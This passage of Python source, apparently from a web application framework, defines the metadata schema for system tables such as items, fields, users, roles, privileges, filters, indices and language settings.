task.sys_params.add_field(14, 'f_timeout', task.language('session_timeout'), common.INTEGER)
task.sys_params.add_field(15, 'f_delete_reports_after', task.language('delete_reports_after'), common.INTEGER)
task.sys_params.add_field(16, 'f_ignore_change_ip', task.language('ignore_change_ip'), common.BOOLEAN)
task.sys_params.add_field(17, 'f_history_item', task.language('history'), common.INTEGER, False, task.sys_items, 'f_name')
task.sys_params.add_field(18, 'f_lock_item', 'Lock item', common.INTEGER, False, task.sys_items, 'f_name')
task.sys_params.add_field(19, 'f_sys_group', task.language('system_group'), common.INTEGER)
task.sys_params.add_field(20, 'f_theme', task.language('theme'), common.INTEGER, required=True, lookup_values=get_value_list(common.THEMES))
task.sys_params.add_field(21, 'f_small_font', task.language('small_font'), common.BOOLEAN)
task.sys_params.add_field(22, 'f_full_width', task.language('full_width'), common.BOOLEAN)
task.sys_params.add_field(23, 'f_forms_in_tabs', task.language('forms_in_tabs'), common.BOOLEAN)
task.sys_params.add_field(24, 'f_max_content_length', 'Max content length (MB)', common.INTEGER)
task.sys_params.add_field(25, 'f_secret_key', 'Secret key', common.TEXT, size = 256)
task.sys_items.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_items.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(3, 'parent', 'Parent id', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(4, 'task_id', 'Task id', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(5, 'type_id', 'Type id', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(6, 'table_id', 'Table id', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(7, 'has_children', 'Has_children', common.BOOLEAN, visible=False, edit_visible=False)
task.sys_items.add_field(8, 'f_index', 'Index', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(9, 'f_name', task.language('caption'), common.TEXT, required=True, size=256)
task.sys_items.add_field(10, 'f_item_name', task.language('name'), common.TEXT, required=True, size=256)
task.sys_items.add_field(11, 'f_table_name', task.language('table_name'), common.TEXT, size=256)
task.sys_items.add_field(12, 'f_gen_name', task.language('gen_name'), common.TEXT, size=256)
task.sys_items.add_field(13, 'f_view_template', task.language('report_template'), common.TEXT, size=256)
task.sys_items.add_field(14, 'f_visible', task.language('visible'), common.BOOLEAN)
task.sys_items.add_field(15, 'f_soft_delete', task.language('soft_delete'), common.BOOLEAN)
task.sys_items.add_field(16, 'f_client_module', task.language('client_module'), common.LONGTEXT, visible=False, edit_visible=False)
task.sys_items.add_field(17, 'f_web_client_module', task.language('client_module'), common.LONGTEXT, visible=False, edit_visible=False)
task.sys_items.add_field(18, 'f_server_module', task.language('server_module'), common.LONGTEXT, visible=False, edit_visible=False)
task.sys_items.add_field(19, 'f_info', 'Info', common.LONGTEXT, visible=False, edit_visible=False)
task.sys_items.add_field(20, 'f_virtual_table', task.language('virtual_table'), common.BOOLEAN)
task.sys_items.add_field(21, 'f_js_external', task.language('js_external'), common.BOOLEAN)
task.sys_items.add_field(22, 'f_js_filename', 'js_file_name', common.TEXT, size=1024)
task.sys_items.add_field(23, 'f_primary_key', task.language('primary_key'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_items.add_field(24, 'f_deleted_flag', task.language('deleted_flag'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_items.add_field(25, 'f_master_id', task.language('master_id'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_items.add_field(26, 'f_master_rec_id', task.language('master_rec_id'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_items.add_field(27, 'f_js_funcs', 'f_js_funcs', common.LONGTEXT, visible=False, edit_visible=False)
task.sys_items.add_field(28, 'f_keep_history', task.language('history'), common.BOOLEAN)
task.sys_items.add_field(29, 'f_edit_lock', task.language('edit_lock'), common.BOOLEAN)
task.sys_items.add_field(30, 'sys_id', 'sys_id', common.INTEGER)
task.sys_items.add_field(31, 'f_select_all', task.language('select_all'), common.BOOLEAN)
task.sys_items.add_filter('id', 'ID', 'id', common.FILTER_EQ, visible=False)
task.sys_items.add_filter('not_id', 'ID', 'id', common.FILTER_NE, visible=False)
task.sys_items.add_filter('parent', 'Parent', 'parent', common.FILTER_EQ, visible=False)
task.sys_items.add_filter('task_id', 'Task', 'task_id', common.FILTER_EQ, visible=False)
task.sys_items.add_filter('type_id', 'Type', 'type_id', common.FILTER_IN, visible=False)
task.sys_items.add_filter('table_id', 'Type', 'table_id', common.FILTER_EQ, visible=False)
task.sys_items.add_filter('type_id_gt', 'Type', 'type_id', common.FILTER_GT, visible=False)
task.sys_tasks = task.sys_catalogs.add_catalog('sys_tasks', '', 'SYS_TASKS')
task.sys_tasks.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_tasks.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_tasks.add_field(3, 'task_id', 'Task ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_tasks.add_field(4, 'f_name', task.language('caption'), common.TEXT, required=True, size=256, edit_visible=False)
task.sys_tasks.add_field(5, 'f_item_name', task.language('name'), common.TEXT, required=True, size=256, edit_visible=False)
task.sys_tasks.add_field(6, 'f_manual_update', task.language('manual_update'), common.BOOLEAN, visible=False, edit_visible=False)
task.sys_tasks.add_field(7, 'f_db_type', task.language('db_type'), common.INTEGER, required=True, lookup_values=get_value_list(db_modules.DB_TYPE))
task.sys_tasks.add_field(8, 'f_alias', task.language('db_name'), common.TEXT, required=True, size = 30)
task.sys_tasks.add_field(9, 'f_login', task.language('login'), common.TEXT, size = 30)
task.sys_tasks.add_field(10, 'f_password', task.language('password'), common.TEXT, size = 30)
task.sys_tasks.add_field(11, 'f_host', task.language('host'), common.TEXT, size = 30)
task.sys_tasks.add_field(12, 'f_port', task.language('port'), common.TEXT, size = 10)
task.sys_tasks.add_field(13, 'f_encoding', task.language('encoding'), common.TEXT, size = 30)
task.sys_tasks.add_field(14, 'f_server', 'Server', common.TEXT, size = 30)
task.sys_tasks.add_filter('task_id', 'Task ID', 'task_id', common.FILTER_EQ, visible=False)
task.sys_lookup_lists = task.sys_catalogs.add_catalog('sys_lookup_lists', 'Lookup lists', 'SYS_LOOKUP_LISTS')
task.sys_lookup_lists.add_field(1, 'id', 'ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_lookup_lists.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_lookup_lists.add_field(3, 'f_name', task.language('name'), common.TEXT, required=True, size=256)
task.sys_lookup_lists.add_field(4, 'f_lookup_values_text', 'Text to store lookup_values', common.LONGTEXT)
task.sys_field_lookups = task.sys_tables.add_table('sys_field_lookups', 'Lookup item', 'SYS_FIELD_LOOKUPS')
task.sys_field_lookups.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_field_lookups.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_field_lookups.add_field(3, 'f_value', task.language('value'), common.INTEGER)
task.sys_field_lookups.add_field(4, 'f_lookup', task.language('lookup_value'), common.TEXT, size=612)
task.sys_fields.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields.add_field(2, 'deleted', 'Deleted', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields.add_field(3, 'owner_id', 'Owner ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields.add_field(4, 'owner_rec_id', 'Owner record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields.add_field(5, 'task_id', 'Task ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields.add_field(6, 'f_name', task.language('caption'), common.TEXT, True, size=256)
task.sys_fields.add_field(7, 'f_field_name', task.language('name'), common.TEXT, True, size=256)
task.sys_fields.add_field(8, 'f_db_field_name', task.language('db_field_name'), common.TEXT, False, size=256)
task.sys_fields.add_field(9, 'f_data_type', task.language('data_type'), common.INTEGER, True, False, lookup_values=get_value_list(common.FIELD_TYPES))
task.sys_fields.add_field(10, 'f_size', task.language('size'), common.INTEGER)
task.sys_fields.add_field(11, 'f_object', task.language('object'), common.INTEGER, False, task.sys_items, 'f_item_name')
task.sys_fields.add_field(12, 'f_object_field', task.language('object_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_fields.add_field(13, 'f_object_field1', task.language('object_field') + ' 2', common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_fields.add_field(14, 'f_object_field2', task.language('object_field') + ' 3', common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_fields.add_field(15, 'f_master_field', task.language('master_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_fields.add_field(16, 'f_multi_select', task.language('multi_select'), common.BOOLEAN)
task.sys_fields.add_field(17, 'f_multi_select_all', task.language('multi_select_all'), common.BOOLEAN)
task.sys_fields.add_field(18, 'f_enable_typehead', task.language('enable_typehead'), common.BOOLEAN)
task.sys_fields.add_field(19, 'f_lookup_values', task.language('lookup_values'), common.INTEGER, False, task.sys_lookup_lists, 'f_name')
task.sys_fields.add_field(20, 'f_required', task.language('required'), common.BOOLEAN)
task.sys_fields.add_field(21, 'f_calculated', task.language('calculated'), common.BOOLEAN, visible=False, edit_visible=False)
task.sys_fields.add_field(22, 'f_default', task.language('default'), common.BOOLEAN)
task.sys_fields.add_field(23, 'f_read_only', task.language('read_only'), common.BOOLEAN)
task.sys_fields.add_field(24, 'f_alignment', task.language('alignment'), common.INTEGER, lookup_values=get_value_list(common.ALIGNMENT))
task.sys_fields.add_field(25, 'f_default_value', task.language('default_value'), common.TEXT, False, False, size=256)
task.sys_fields.add_field(26, 'f_help', task.language('help'), common.LONGTEXT, visible=False)
task.sys_fields.add_field(27, 'f_placeholder', task.language('placeholder'), common.TEXT, visible=False, size=256)
task.sys_fields.add_field(28, 'f_mask', 'Mask', common.TEXT, visible=False, size=30)
task.sys_fields.add_field(29, 'f_default_lookup_value', task.language('default_value'), common.INTEGER, lookup_values=[[0, '']])
task.sys_fields.add_field(30, 'f_image_edit_width', 'Edit width', common.INTEGER)
task.sys_fields.add_field(31, 'f_image_edit_height', 'Edit height', common.INTEGER)
task.sys_fields.add_field(32, 'f_image_view_width', 'View width', common.INTEGER)
task.sys_fields.add_field(33, 'f_image_view_height', 'View height', common.INTEGER)
task.sys_fields.add_field(34, 'f_image_placeholder', 'Placeholder image', common.IMAGE, image_edit_width=230)
task.sys_fields.add_field(35, 'f_image_camera', 'Capture from camera', common.BOOLEAN)
task.sys_fields.add_field(36, 'f_file_download_btn', 'Download btn', common.BOOLEAN)
task.sys_fields.add_field(37, 'f_file_open_btn', 'Open btn', common.BOOLEAN)
task.sys_fields.add_field(38, 'f_file_accept', 'Accept', common.TEXT, size=512)
task.sys_fields.add_filter('id', 'ID', 'id', common.FILTER_EQ, visible=False)
task.sys_fields.add_filter('owner_rec_id', 'Owner record ID', 'owner_rec_id', common.FILTER_IN, visible=False)
task.sys_fields.add_filter('task_id', 'Task', 'task_id', common.FILTER_EQ, visible=False)
task.sys_fields.add_filter('not_id', 'not ID', 'id', common.FILTER_NE, visible=False)
task.sys_fields.add_filter('object', 'Object ID', 'f_object', common.FILTER_EQ, visible=False)
task.sys_fields.add_filter('master_field_is_null', 'Master field', 'f_master_field', common.FILTER_ISNULL, visible=False)
task.sys_fields.add_filter('master_field', 'Master field', 'f_master_field', common.FILTER_EQ, visible=False)
task.item_fields = task.sys_items.add_detail(task.sys_fields)
task.sys_report_params = task.sys_tables.add_table('sys_report_params', task.language('report_params'), 'SYS_REPORT_PARAMS')
task.sys_report_params.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(3, 'owner_id', 'Owner ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(4, 'owner_rec_id', 'Owner record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(5, 'task_id', 'Task ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(6, 'f_index', task.language('index'), common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(7, 'f_name', task.language('caption'), common.TEXT, True, size = 30)
task.sys_report_params.add_field(8, 'f_param_name', task.language('name'), common.TEXT, True, size = 30)
task.sys_report_params.add_field(9, 'f_data_type', task.language('data_type'), common.INTEGER, True, False, lookup_values=get_value_list(common.FIELD_TYPES))
task.sys_report_params.add_field(10, 'f_size', task.language('size'), common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(11, 'f_object', task.language('object'), common.INTEGER, False, task.sys_items, 'f_name')
task.sys_report_params.add_field(12, 'f_object_field', task.language('object_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_report_params.add_field(13, 'f_object_field1', task.language('object_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_report_params.add_field(14, 'f_object_field2', task.language('object_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_report_params.add_field(15, 'f_multi_select', task.language('multi_select'), common.BOOLEAN)
task.sys_report_params.add_field(16, 'f_multi_select_all', task.language('multi_select_all'), common.BOOLEAN)
task.sys_report_params.add_field(17, 'f_enable_typehead', task.language('enable_typehead'), common.BOOLEAN)
task.sys_report_params.add_field(18, 'f_lookup_values', task.language('lookup_values'), common.INTEGER, False, task.sys_lookup_lists, 'f_name')
task.sys_report_params.add_field(19, 'f_required', task.language('required'), common.BOOLEAN)
task.sys_report_params.add_field(20, 'f_visible', task.language('visible'), common.BOOLEAN)
task.sys_report_params.add_field(21, 'f_alignment', task.language('alignment'), common.INTEGER, lookup_values=get_value_list(common.ALIGNMENT))
task.sys_report_params.add_field(22, 'f_master_field', task.language('master_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_report_params.add_field(23, 'f_help', task.language('help'), common.LONGTEXT, visible=False)
task.sys_report_params.add_field(24, 'f_placeholder', task.language('placeholder'), common.TEXT, visible=False, size=256)
task.sys_report_params.add_filter('owner_rec_id', 'Owner rec ID ', 'owner_rec_id', common.FILTER_EQ, visible=False)
task.sys_report_params.add_filter('task_id', 'Task ID', 'task_id', common.FILTER_EQ, visible=False)
task.sys_indices = task.sys_tables.add_table('sys_indices', task.language('indices'), 'SYS_INDICES')
task.sys_indices.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_indices.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_indices.add_field(3, 'owner_id', 'Owner ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_indices.add_field(4, 'owner_rec_id', 'Owner record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_indices.add_field(5, 'task_id', 'Task ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_indices.add_field(6, 'f_index_name', task.language('index_name'), common.TEXT, True, size = 100)
task.sys_indices.add_field(7, 'descending', task.language('descending'), common.BOOLEAN)
task.sys_indices.add_field(8, 'f_unique_index', task.language('unique_index'), common.BOOLEAN)
task.sys_indices.add_field(9, 'f_foreign_index', task.language('foreign_index'), common.BOOLEAN, visible=False, edit_visible=False)
task.sys_indices.add_field(10, 'f_foreign_field', task.language('foreign_field'), common.INTEGER, False, task.sys_fields, 'f_field_name', visible=False, edit_visible=False)
task.sys_indices.add_field(11, 'f_fields_list', task.language('fields'), common.TEXT, size = 100, visible=False, edit_visible=False)
task.sys_indices.add_filter('id', 'ID', 'id', common.FILTER_EQ, visible=False)
task.sys_indices.add_filter('owner_rec_id', 'Owner record ID', 'owner_rec_id', common.FILTER_EQ, visible=False)
task.sys_indices.add_filter('task_id', 'Task ID', 'task_id', common.FILTER_EQ, visible=False)
task.sys_indices.add_filter('foreign_index', 'Owner record ID', 'f_foreign_index', common.FILTER_EQ, visible=False)
task.sys_filters = task.sys_tables.add_table('sys_filters', task.language('filters'), 'SYS_FILTERS')
task.sys_filters.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(3, 'owner_id', 'Owner ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(4, 'owner_rec_id', 'Owner record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(5, 'task_id', 'Task ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(6, 'f_index', task.language('index'), common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(7, 'f_field', task.language('field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_filters.add_field(8, 'f_name', task.language('caption'), common.TEXT, True)
task.sys_filters.add_field(9, 'f_filter_name', task.language('name'), common.TEXT, True)
task.sys_filters.add_field(10, 'f_data_type', task.language('data_type'), common.INTEGER, False, visible=False, edit_visible=False, lookup_values=get_value_list(common.FIELD_TYPES))
task.sys_filters.add_field(11, 'f_type', task.language('filter_type'), common.INTEGER, False, lookup_values=get_value_list(common.FILTER_STRING))
task.sys_filters.add_field(12, 'f_multi_select_all', task.language('multi_select_all'), common.BOOLEAN, edit_visible=False)
task.sys_filters.add_field(13, 'f_visible', task.language('visible'), common.BOOLEAN)
task.sys_filters.add_field(14, 'f_help', task.language('help'), common.LONGTEXT, visible=False)
task.sys_filters.add_field(15, 'f_placeholder', task.language('placeholder'), common.TEXT, visible=False, size=256)
task.sys_filters.add_filter('owner_rec_id', 'Owner rec ID ', 'owner_rec_id', common.FILTER_EQ, visible=False)
task.sys_filters.add_filter('task_id', 'Task ID', 'task_id', common.FILTER_EQ, visible=False)
task.sys_users = task.sys_catalogs.add_catalog('sys_users', task.language('users'), 'SYS_USERS')
task.sys_roles = task.sys_catalogs.add_catalog('sys_roles', task.language('roles'), 'SYS_ROLES')
task.sys_users.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_users.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_users.add_field(3, 'f_name', task.language('name'), common.TEXT, required=True, size=128)
task.sys_users.add_field(4, 'f_login', task.language('login'), common.TEXT, required=True, size=128)
task.sys_users.add_field(5, 'f_password', task.language('password'), common.TEXT, required=False, size=128)
task.sys_users.add_field(6, 'f_role', task.language('role'), common.INTEGER, True, task.sys_roles, 'f_name')
task.sys_users.add_field(7, 'f_info', task.language('info'), common.TEXT, edit_visible=False, size=128)
task.sys_users.add_field(8, 'f_admin', task.language('admin'), common.BOOLEAN)
task.sys_users.add_field(9, 'f_psw_hash', 'psw_hash', common.TEXT, edit_visible=False, size=10000)
task.sys_users.add_field(10, 'f_ip', 'ip', common.TEXT, edit_visible=False, size=10000)
task.sys_users.add_field(11, 'f_uuid', 'uuid', common.TEXT, edit_visible=False, size=10000)
task.sys_roles.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_roles.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_roles.add_field(3, 'f_name', task.language('roles'), common.TEXT, required=True, size=30)
task.sys_roles.add_filter('id', 'ID', 'id', common.FILTER_EQ, visible=False)
task.sys_privileges = task.sys_tables.add_table('sys_privileges', task.language('privileges'), 'SYS_PRIVILEGES')
task.sys_privileges.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_privileges.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_privileges.add_field(3, 'owner_id', 'Owner ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_privileges.add_field(4, 'owner_rec_id', 'Owner record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_privileges.add_field(5, 'item_id', task.language('item'), common.INTEGER, False, task.sys_items, 'f_name')
task.sys_privileges.add_field(6, 'owner_item', task.language('owner'), common.TEXT, size=128)
task.sys_privileges.add_field(7, 'f_can_view', task.language('can_view'), common.BOOLEAN, editable=True)
task.sys_privileges.add_field(8, 'f_can_create', task.language('can_create'), common.BOOLEAN, editable=True)
task.sys_privileges.add_field(9, 'f_can_edit', task.language('can_edit'), common.BOOLEAN, editable=True)
task.sys_privileges.add_field(10, 'f_can_delete', task.language('can_delete'), common.BOOLEAN, editable=True)
task.sys_privileges.add_filter('owner_rec_id', 'Owner record ID', 'owner_rec_id', common.FILTER_EQ, visible=False)
task.role_privileges = task.sys_roles.add_detail(task.sys_privileges)
task.sys_code_editor = task.sys_catalogs.add_catalog('sys_code_editor', 'Editor', '')
task.sys_code_editor.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_code_editor.add_field(2, 'parent', 'parent', common.INTEGER)
task.sys_code_editor.add_field(3, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_code_editor.add_field(4, 'name', task.language('caption'), common.TEXT, size = 10000)
task.sys_fields_editor = task.sys_catalogs.add_catalog('sys_fields_editor', 'Editor', '')
task.sys_fields_editor.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_fields_editor.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields_editor.add_field(3, 'name', task.language('caption'), common.TEXT, size = 256)
task.sys_fields_editor.add_field(4, 'param1', 'param1', common.BOOLEAN)
task.sys_fields_editor.add_field(5, 'param2', 'param2', common.BOOLEAN)
task.sys_fields_editor.add_field(6, 'param3', 'param3', common.TEXT, size = 6)
task.sys_fields_editor.add_field(7, 'width', task.language('width'), common.INTEGER)
task.sys_fields_editor.add_field(8, 'col_count', task.language('col_count'), common.INTEGER)
task.sys_fields_editor.add_field(9, 'in_well', task.language('in_well'), common.BOOLEAN)
task.sys_fields_editor.add_field(10, 'pagination', 'Pagination', common.BOOLEAN)
task.sys_fields_editor.add_field(11, 'row_count', task.language('row_count'), common.INTEGER)
task.sys_fields_editor.add_field(11, 'row_line_count', task.language('row_line_count'), common.INTEGER)
task.sys_fields_editor.add_field(11, 'freeze_count', task.language('freeze_count'), common.INTEGER)
task.sys_fields_editor.add_field(12, 'expand_selected_row', task.language('expand_selected_row'), common.INTEGER)
task.sys_fields_editor.add_field(13, 'multiselect', task.language('multi_select'), common.BOOLEAN)
task.sys_fields_editor.add_field(14, 'dblclick_edit', task.language('dblclick_edit'), common.BOOLEAN)
task.sys_fields_editor.add_field(15, 'sort_fields', task.language('sort_fields'), common.KEYS, False, task.sys_fields, 'id')
task.sys_fields_editor.add_field(16, 'edit_fields', task.language('edit_fields'), common.KEYS, False, task.sys_fields, 'id')
task.sys_fields_editor.add_field(16, 'edit_fields', task.language('edit_fields'), common.KEYS, False, task.sys_fields, 'id')
task.sys_fields_editor.add_field(17, 'summary_fields', task.language('summary_fields'), common.KEYS, False, task.sys_fields, 'id')
task.sys_fields_editor.add_field(18, 'label_size', task.language('label_size'), common.INTEGER, lookup_values=get_value_list(['xSmall', 'Small', 'Medium', 'Large', 'xLarge']))
task.sys_fields_editor.add_field(19, 'history_button', task.language('history'), common.BOOLEAN)
task.sys_fields_editor.add_field(20, 'refresh_button', task.language('refresh_button'), common.BOOLEAN)
task.sys_fields_editor.add_field(21, 'close_button', task.language('close_button'), common.BOOLEAN)
task.sys_fields_editor.add_field(22, 'close_on_escape', task.language('close_on_escape'), common.BOOLEAN)
task.sys_fields_editor.add_field(23, 'form_border', task.language('form_border'), common.BOOLEAN)
task.sys_fields_editor.add_field(24, 'form_header', task.language('form_header'), common.BOOLEAN)
task.sys_fields_editor.add_field(25, 'enable_search', task.language('enable_search'), common.BOOLEAN)
task.sys_fields_editor.add_field(26, 'enable_filters', task.language('enable_filters'), common.BOOLEAN)
task.sys_fields_editor.add_field(27, 'edit_details', task.language('edit_details'), common.KEYS, False, task.sys_items, 'id')
task.sys_fields_editor.add_field(28, 'view_detail', task.language('view_detail'), common.KEYS, False, task.sys_items, 'id')
task.sys_fields_editor.add_field(29, 'detail_height', 'Detail height', common.INTEGER, False)
task.sys_fields_editor.add_field(30, 'buttons_on_top', 'Buttons on top', common.BOOLEAN)
task.sys_fields_editor.add_field(31, 'height', 'Height', common.INTEGER, False)
task.sys_fields_editor.add_field(32, 'modeless', task.language('modeless'), common.BOOLEAN)
task.sys_fields_editor.add_field(33, 'search_field', task.language('default_search_field'), common.KEYS, False, task.sys_fields, 'id')
task.sys_search = task.sys_catalogs.add_catalog('sys_search', task.language('find_in_task'), '')
task.sys_search.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_search.add_field(2, 'parent', 'parent', common.INTEGER)
task.sys_search.add_field(3, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_search.add_field(4, 'find_text', task.language('find'), common.TEXT, size = 1000)
task.sys_search.add_field(5, 'case_sensitive', task.language('case_sensitive'), common.BOOLEAN)
task.sys_search.add_field(6, 'whole_words', task.language('whole_words'), common.BOOLEAN)
task.sys_new_group = task.sys_catalogs.add_catalog('sys_new_group', task.language('new_group_type'), '')
task.sys_new_group.add_field(1, 'group_type', 'Group type', common.INTEGER, required=True, lookup_values=get_value_list(common.GROUP_TYPES))
task.sys_languages = task.sys_catalogs.add_catalog('sys_languages', 'Languages', 'SYS_LANGUAGES')
task.sys_languages.add_field(1, 'id', 'ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_languages.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_languages.add_field(3, 'f_abr', 'ISO code', common.INTEGER, required=True)
task.sys_languages.add_field(4, 'f_name', 'Language', common.TEXT, required=True, size=20)
task.sys_languages.add_field(5, 'f_rtl', 'Right to left', common.BOOLEAN)
task.sys_countries = task.sys_catalogs.add_catalog('sys_countries', 'Countries', 'SYS_COUNTRIES')
task.sys_countries.add_field(1, 'id', 'ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_countries.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_countries.add_field(3, 'f_abr', 'ISO code', common.INTEGER, required=True)
task.sys_countries.add_field(4, 'f_name', 'Country', common.TEXT, required=True, size=20)
task.sys_langs.add_field(1, 'id', 'ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_langs.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_langs.add_field(3, 'f_name', 'Language', common.TEXT, required=True, size=100)
task.sys_langs.add_field(4, 'f_abr', 'ISO code', common.TEXT, visible=False, size=20)
task.sys_langs.add_field(5, 'f_language', 'Language', common.INTEGER, True, task.sys_languages, 'f_name', visible=False, enable_typeahead=True)
task.sys_langs.add_field(6, 'f_country', 'Country', common.INTEGER, True, task.sys_countries, 'f_name', visible=False, enable_typeahead=True)
task.sys_langs.add_field(7, 'f_decimal_point', 'Decimal point', common.TEXT, size=1, visible=False, edit_visible=False)
task.sys_langs.add_field(8, 'f_mon_decimal_point', 'Monetory decimal point', common.TEXT, size=1, visible=False, edit_visible=False)
task.sys_langs.add_field(9, 'f_mon_thousands_sep', 'Monetory thousands separator', common.TEXT, size=3, visible=False, edit_visible=False)
task.sys_langs.add_field(10, 'f_currency_symbol', 'Currency symbol', common.TEXT, size=10, visible=False, edit_visible=False)
task.sys_langs.add_field(11, 'f_frac_digits', 'Number of fractional digits', common.INTEGER, visible=False, edit_visible=False)
task.sys_langs.add_field(12, 'f_p_cs_precedes', 'Currency symbol precedes the value (positive values)', common.BOOLEAN, visible=False, edit_visible=False)
task.sys_langs.add_field(13, 'f_n_cs_precedes', 'Currency symbol precedes the value (negative values)', common.BOOLEAN, visible=False, edit_visible=False)
task.sys_langs.add_field(14, 'f_p_sep_by_space', 'Currency symbol is separated by a space (positive values)', common.BOOLEAN, visible=False, edit_visible=False)
task.sys_langs.add_field(15, 'f_n_sep_by_space', 'Currency symbol is separated by a space (negative values)', common.BOOLEAN, visible=False, edit_visible=False)
task.sys_langs.add_field(16, 'f_positive_sign', 'Symbol for a positive monetary value', common.TEXT, size=1, visible=False, edit_visible=False)
task.sys_langs.add_field(17, 'f_negative_sign', 'Symbol for a negative monetary value', common.TEXT, size=1, visible=False, edit_visible=False)
task.sys_langs.add_field(18, 'f_p_sign_posn', 'The position of the sign (positive values)', common.INTEGER, visible=False, edit_visible=False)
task.sys_langs.add_field(19, 'f_n_sign_posn', 'The position of the sign (negative values)', common.INTEGER, visible=False, edit_visible=False)
task.sys_langs.add_field(20, 'f_d_fmt', 'Date format string', common.TEXT, size=30, visible=False, edit_visible=False)
task.sys_langs.add_field(21, 'f_d_t_fmt', 'Date and time format string', common.TEXT, size=30, visible=False, edit_visible=False)
task.sys_langs.add_field(22, 'f_rtl', 'Right to left', common.BOOLEAN, visible=False)
task.sys_lang_keys_values = task.sys_catalogs.add_catalog('sys_lang_keys_values', 'Language values', '')
task.sys_lang_keys_values.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_lang_keys_values.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_lang_keys_values.add_field(3, 'f_type', 'Key type', common.INTEGER, visible=False, edit_visible=False)
task.sys_lang_keys_values.add_field(3, 'f_lang', 'Language ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_lang_keys_values.add_field(4, 'f_key', 'Key', common.INTEGER, visible=False, edit_visible=False)
task.sys_lang_keys_values.add_field(5, 'f_value', 'Translation', common.TEXT, size=1048)
